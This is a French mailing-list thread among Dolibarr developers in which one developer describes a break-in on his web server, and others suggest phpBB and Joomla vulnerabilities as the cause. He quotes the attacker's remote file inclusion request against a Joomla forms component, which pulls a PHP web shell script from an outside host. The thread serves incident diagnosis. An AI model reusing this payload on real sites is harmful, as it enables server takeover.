Merci, mais ce module n'est pas installé... heureusement apparement :)) Régis
> http://www.frsirt.com/bulletins/9992 > > Titre : JoomlaPack for Joomla "mosConfig_absolute_path" PHP File Inclusion > vulnerability > > -----Original Message----- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of > Régis Houssin > Sent: vendredi 13 avril 2007 23:51 > To: 'Discussions sur le developpement de Dolibarr' > Subject: RE: [Dolibarr-dev] Dolibarr.org et forum > > Merci rodolphe, > > En fait je viens de trouver, ca vient de mon site joomla qui n'était pas à > jour et qui émulait le register_global à on grrrrr. > > Voici ce qu'ils ont mis : > > /components/com_facileforms/facileforms.frame.php?ff_compath=http://tamturk. > by.ru/r57.txt? > > Ce que je ne comprends pas c'est comment de r57.txt ca c'est retrouvé en > users.php ? > > Régis > > > -----Message d'origine----- > De : [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] De > la part de Rodolphe Quiedeville > Envoyé : vendredi 13 avril 2007 22:53 > À : Discussions sur le developpement de Dolibarr > Objet : Re: [Dolibarr-dev] Dolibarr.org et forum > > Le 13.04.2007 21:48, Régis Houssin a ecrit : >> Bonjour, >> >> Je viens d'être victime d'un piratage sur mon serveur web. >> Le forum et le site de Laurent (dolibarr.org) sont momentanément fermés > afin >> que je règle le problème. >> >> Apparemment les hackers ont utilisé un script php nommé c99shell >> >> Reste à savoir comment ils ont pu le télécharger sur le serveur. >> >> Si vous avez une idée sachant que j'ai des sites en joomla et des forums > en >> phpbb. > > phpbb est connu pour être assez vulnérable il y a un lien ici qui parle > de c99shell > http://www.phpbb.com/community/viewtopic.php?f=1&t=396462&p=2164981&hilit= > > A++ > > -- > Rodolphe Quiédeville - Artisan Logiciel Libre > http://rodolphe.quiedeville.org/ > Travaillons Libre - http://fr.lolix.org/ > W 2°56'45'' - N 47°38'20'' > > > > _______________________________________________ > Dolibarr-dev mailing list > [email protected] > http://lists.nongnu.org/mailman/listinfo/dolibarr-dev > > > > _______________________________________________ > Dolibarr-dev mailing list > [email protected] > http://lists.nongnu.org/mailman/listinfo/dolibarr-dev > > > > _______________________________________________ > Dolibarr-dev mailing list > [email protected] > http://lists.nongnu.org/mailman/listinfo/dolibarr-dev > _______________________________________________ Dolibarr-dev mailing list [email protected] http://lists.nongnu.org/mailman/listinfo/dolibarr-dev
